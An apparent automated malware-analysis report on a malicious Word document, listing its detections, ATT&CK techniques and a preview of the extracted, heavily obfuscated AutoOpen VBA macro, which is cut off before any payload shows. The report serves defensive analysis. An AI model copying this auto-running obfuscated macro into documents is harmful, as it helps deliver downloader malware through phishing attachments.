MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, a common technique for initial execution. The macro is heavily obfuscated, but its presence and the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN' heuristic firings indicate it is designed to run automatically. The primary function of the macro appears to be downloading and executing a second-stage payload, though the specific URL or payload is not directly discernible due to obfuscation.
Heuristics 5
-
ClamAV: Doc.Malware.00536d-6706117-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6706117-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110502 bytes |
SHA-256: f196f431cf17771386b81d4719b51c60d9841721eb41d6a3836f48be50f4a4b1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const XyPaDywALOGyfWylusIfemguVobYwIxy = 0
Sub AutoOpen()
On Error Resume Next
Dim neRIXYtokodijarOQIQezPcibeHImAaD(3)
If "wyVebmUjYQZozKEfu" <> "wyVebmUjYQZozKEfu" & CStr(CInt("5182")) Then
Dim VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(3)
If "IiilogYCUpBAT" <> "IiilogYCUpBAT" & CStr(CInt("3454")) Then
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(0) = VarType(VarType(CInt("3454")))
If "IiilogYCUpBAT" <> "3454" Then
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(0) = 3454.5
End If
End If
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(1) = IiilogYCUpBAT & "55"
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(2) = Minute(34543454)
neRIXYtokodijarOQIQezPcibeHImAaD(0) = VarType(VarType(CInt("5182")))
If "wyVebmUjYQZozKEfu" <> "5182" Then
Dim bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(3)
If "reWEgeaYGaBu" <> "reWEgeaYGaBu" & CStr(CInt("197")) Then
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(0) = VarType(VarType(CInt("197")))
If "reWEgeaYGaBu" <> "197" Then
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(0) = 197.8
End If
End If
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(1) = reWEgeaYGaBu & "88"
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(2) = Minute(197197)
Dim nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(3)
If "NanmOSAaEfIvopaoho" <> "NanmOSAaEfIvopaoho" & CStr(CInt("9339")) Then
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(0) = VarType(VarType(CInt("9339")))
If "NanmOSAaEfIvopaoho" <> "9339" Then
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(0) = 9339.7
End If
End If
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(1) = NanmOSAaEfIvopaoho & "77"
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(2) = Minute(93399339)
neRIXYtokodijarOQIQezPcibeHImAaD(0) = 5182.9
Dim VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(3)
If "qUrgOqiKDBuzBoBA" <> "qUrgOqiKDBuzBoBA" & CStr(CInt("4356")) Then
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(0) = VarType(VarType(CInt("4356")))
If "qUrgOqiKDBuzBoBA" <> "4356" Then
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(0) = 4356.4
End If
End If
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(1) = qUrgOqiKDBuzBoBA & "44"
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(2) = Minute(43564356)
Dim xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(3)
If "fiaoCAnywoRuJubYSu" <> "fiaoCAnywoRuJubYSu" & CStr(CInt("4954")) Then
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(0) = VarType(VarType(CInt("4954")))
If "fiaoCAnywoRuJubYSu" <> "4954" Then
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(0) = 4954.5
End If
End If
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(1) = fiaoCAnywoRuJubYSu & "55"
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(2) = Minute(49544954)
End If
Dim JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(3)
If "iAZoQOCAGACiMUwyCePACAae" <> "iAZoQOCAGACiMUwyCePACAae" & CStr(CInt("2426")) Then
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(0) = VarType(VarType(CInt("2426")))
If "iAZoQOCAGACiMUwyCePACAae" <> "2426" Then
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(0) = 2426.4
End If
End If
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(1) = iAZoQOCAGACiMUwyCePACAae & "44"
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(2) = Minute(24262426)
Dim dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(3)
If "QINoJAVajYxYVes" <> "QINoJAVajYxYVes" & CStr(CInt("1894")) Then
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(0) = VarType(VarType(CInt("1894")))
If "QINoJAVajYxYVes" <> "1894" Then
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(0) = 1894.1
End If
End If
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(1) = QINoJAVajYxYVes & "1010"
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(2) = Minute(18941894)
End If
Dim KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(3)
If "MONORufiqoX" <> "MONORufiqoX" & CStr(CInt("693")) Then
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(0) = VarType(VarType(CInt("693")))
If "MONORufiqoX" <> "693" Then
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(0) = 693.8
End If
End If
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(1) = MONORufiqoX & "88"
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(2) = Minute(693693)
neRIXYtokodijarOQIQezPci
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.